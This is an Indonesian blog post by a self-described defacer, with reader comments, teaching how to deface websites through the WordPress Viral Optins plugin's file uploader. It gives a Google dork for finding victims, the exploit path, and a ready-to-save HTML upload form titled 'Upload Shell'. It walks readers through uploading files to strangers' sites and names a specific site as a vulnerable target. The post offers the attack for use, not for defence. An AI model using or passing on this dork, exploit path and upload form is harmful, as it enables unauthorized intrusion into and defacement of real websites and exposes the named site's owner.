Selasa, 05 April 2016

Tutorial Deface Dengan Metode Viral_Optins v2


   

     Hallo!!!!!!! , Berjumpa Lagi Sama Mr.3RR0R  :v

Gmana Kabarnya.? , Pasti Lagi Online , Sambil Duduk :D

Klau Gitu Saya Lagi Berbagi "Tutorial Deface Dengan Viral_Optins v2"

Langsung Aja Ke Tempat Pembelajaran

- Dork : "inurl:/wp-content/plugins/viral-optins/" ( tanpa tanda " )

Exploit : http://target/wp-content/plugins/viral-optins/api/uploader/file-uploader.php


CSRF : 



<font color="red">
<h1 align="center">Upload Shell</h1></font>
<br>
<body background="black"><style>body {background:black}
input,submit {border:1px;solid green;color:green}</style><center>
<form method="POST" action="target" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">


</form></body>

      Langsung Aja Pergi Ke Google.com , Terus Gunakan Dorknya 

terus Cari Target , Klau dapat masukin Exploit Yang Ada Diatas.

Kalau Vuln Nanti Tuh Tidak Ada tulisan (Blank) .

Upload Deh file yg Berextensi .jpg .png .txt dll (html atau php nggak bisa :v)

Akses file : http://target/wp-content/uploads/(tahun)/(bulan)/file


Vuln Target :"http://ailisgarcia.com/wp-content/plugins/viral-optins/api/uploader/file-
uploader.php"


Exploit Author : Mr.3RR0R (PhantomGhost)


My Facebook : https://www.facebook.com/marselERROR

Forum : phantom-ghost.org

Fanspage : https://www.facebook.com/PG.phtml/

Share this

4 Responses to "Tutorial Deface Dengan Metode Viral_Optins v2"

  1. Balasan
    1. hehehe , maaf gan , bukan sya nggak mau ksih foto , tpi jaringan tdk mendukung gan :v , nanti sya perbaiki , nanti tambahin vuln target disitu deh :D

      Hapus
  2. masih bingung dg csrf bya url nya kasih mana?

    BalasHapus
    Balasan
    1. itu kode csrf copy di notepad , trus klau udah klik ctrl + s , klau udah pilih all program , trus namakan csrf.html , klau msih nggak vaham belajar dulu sini gan :v >>> http://official-marsel.blogspot.co.id/p/mengenal-cross-site.html

      Hapus